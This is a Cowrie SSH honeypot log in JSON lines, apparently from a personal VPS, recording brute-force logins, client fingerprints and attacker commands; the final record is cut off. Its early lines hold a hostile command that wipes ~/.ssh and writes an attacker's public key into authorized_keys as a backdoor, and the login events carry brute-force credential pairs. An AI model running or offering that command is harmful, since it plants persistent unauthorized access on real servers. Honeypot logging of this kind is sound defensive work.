{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:40:56.527987Z","src_ip":"212.227.235.229","session":"65b456e68a60"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:40:56.528688Z","src_ip":"212.227.235.229","session":"65b456e68a60"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:40:56.529691Z","src_ip":"212.227.235.229","session":"65b456e68a60"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:40:56.741495Z","src_ip":"212.227.235.229","session":"65b456e68a60"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:40:57.667628Z","src_ip":"212.227.235.229","session":"65b456e68a60"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:40:57.668406Z","src_ip":"212.227.235.229","session":"65b456e68a60"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:40:57.881477Z","src_ip":"212.227.235.229","session":"65b456e68a60"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:40:57.882448Z","src_ip":"212.227.235.229","session":"65b456e68a60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":17878,"dst_ip":"1.2.3.4","dst_port":22,"session":"37c65dbe59b2","protocol":"ssh","message":"New connection: 212.227.235.229:17878 (1.2.3.4:22) [session: 37c65dbe59b2]","sensor":"my-vps","timestamp":"2025-08-31T06:40:58.091017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:40:58.092211Z","src_ip":"212.227.235.229","session":"37c65dbe59b2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:40:58.301268Z","src_ip":"212.227.235.229","session":"37c65dbe59b2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:40:59.144202Z","src_ip":"212.227.235.229","session":"37c65dbe59b2"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:41:00.360193Z","src_ip":"212.227.235.229","session":"37c65dbe59b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6072,"dst_ip":"1.2.3.4","dst_port":22,"session":"c073ce1a0c36","protocol":"ssh","message":"New connection: 212.227.235.229:6072 (1.2.3.4:22) [session: c073ce1a0c36]","sensor":"my-vps","timestamp":"2025-08-31T06:41:00.576351Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:41:00.580096Z","src_ip":"212.227.235.229","session":"c073ce1a0c36"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:41:00.797046Z","src_ip":"212.227.235.229","session":"c073ce1a0c36"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:41:01.676213Z","src_ip":"212.227.235.229","session":"c073ce1a0c36"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:41:01.898642Z","src_ip":"212.227.235.229","session":"65b456e68a60"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:41:01.899557Z","src_ip":"212.227.235.229","session":"c073ce1a0c36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44084,"dst_ip":"1.2.3.4","dst_port":22,"session":"aed4781d1292","protocol":"ssh","message":"New connection: 212.227.125.160:44084 (1.2.3.4:22) [session: aed4781d1292]","sensor":"my-vps","timestamp":"2025-08-31T06:41:16.686937Z"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop123","message":"login attempt [hadoop/hadoop123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:41:24.879427Z","src_ip":"212.227.235.229","session":"1c39d72a50da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50460,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bf057b3ecba","protocol":"ssh","message":"New connection: 212.227.235.229:50460 (1.2.3.4:22) [session: 8bf057b3ecba]","sensor":"my-vps","timestamp":"2025-08-31T06:41:25.665184Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:41:25.940569Z","src_ip":"212.227.125.160","session":"aed4781d1292"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:41:25.941571Z","src_ip":"212.227.125.160","session":"aed4781d1292"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:41:26.364877Z","src_ip":"212.227.235.229","session":"8bf057b3ecba"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:41:26.365523Z","src_ip":"212.227.235.229","session":"8bf057b3ecba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35154,"dst_ip":"1.2.3.4","dst_port":22,"session":"b81cc6d339c9","protocol":"ssh","message":"New connection: 212.227.125.160:35154 (1.2.3.4:22) [session: b81cc6d339c9]","sensor":"my-vps","timestamp":"2025-08-31T06:41:27.740332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:41:28.699550Z","src_ip":"212.227.125.160","session":"b81cc6d339c9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:41:28.700281Z","src_ip":"212.227.125.160","session":"b81cc6d339c9"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"root123","message":"login attempt [ubuntu/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:41:31.987367Z","src_ip":"212.227.235.229","session":"8bf057b3ecba"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:41:33.769359Z","src_ip":"212.227.235.229","session":"8bf057b3ecba"}
{"eventid":"cowrie.login.success","username":"root","password":"R","message":"login attempt [root/R] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:41:34.098250Z","src_ip":"212.227.125.160","session":"b81cc6d339c9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:41:36.621877Z","src_ip":"212.227.125.160","session":"b81cc6d339c9"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-31T06:41:36.622586Z","src_ip":"212.227.125.160","session":"b81cc6d339c9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:41:38.019846Z","src_ip":"212.227.125.160","session":"b81cc6d339c9"}
{"eventid":"cowrie.session.closed","duration":"10.3","message":"Connection lost after 10.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:41:38.021014Z","src_ip":"212.227.125.160","session":"b81cc6d339c9"}
{"eventid":"cowrie.session.closed","duration":"80.0","message":"Connection lost after 80.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:41:40.469736Z","src_ip":"212.227.235.229","session":"1c39d72a50da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40240,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c181e6cfb32","protocol":"ssh","message":"New connection: 212.227.125.160:40240 (1.2.3.4:22) [session: 6c181e6cfb32]","sensor":"my-vps","timestamp":"2025-08-31T06:41:45.996937Z"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":42420,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3347d567116","protocol":"ssh","message":"New connection: 201.148.180.50:42420 (1.2.3.4:22) [session: b3347d567116]","sensor":"my-vps","timestamp":"2025-08-31T06:41:46.713682Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:41:46.879104Z","src_ip":"212.227.125.160","session":"6c181e6cfb32"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:41:46.880164Z","src_ip":"212.227.125.160","session":"6c181e6cfb32"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:41:47.899480Z","src_ip":"201.148.180.50","session":"b3347d567116"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:41:47.900474Z","src_ip":"201.148.180.50","session":"b3347d567116"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46530,"dst_ip":"1.2.3.4","dst_port":22,"session":"95c4b3135b1e","protocol":"ssh","message":"New connection: 212.227.235.229:46530 (1.2.3.4:22) [session: 95c4b3135b1e]","sensor":"my-vps","timestamp":"2025-08-31T06:41:48.139967Z"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"root123","message":"login attempt [ubuntu/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:41:49.182582Z","src_ip":"212.227.125.160","session":"6c181e6cfb32"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:41:50.777122Z","src_ip":"212.227.125.160","session":"6c181e6cfb32"}
{"eventid":"cowrie.login.success","username":"root","password":"R","message":"login attempt [root/R] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:41:54.678874Z","src_ip":"201.148.180.50","session":"b3347d567116"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:41:58.086163Z","src_ip":"201.148.180.50","session":"b3347d567116"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T06:41:58.086873Z","src_ip":"201.148.180.50","session":"b3347d567116"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:41:59.306211Z","src_ip":"201.148.180.50","session":"b3347d567116"}
{"eventid":"cowrie.session.closed","duration":"12.6","message":"Connection lost after 12.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:41:59.307470Z","src_ip":"201.148.180.50","session":"b3347d567116"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:41:59.399246Z","src_ip":"212.227.235.229","session":"95c4b3135b1e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 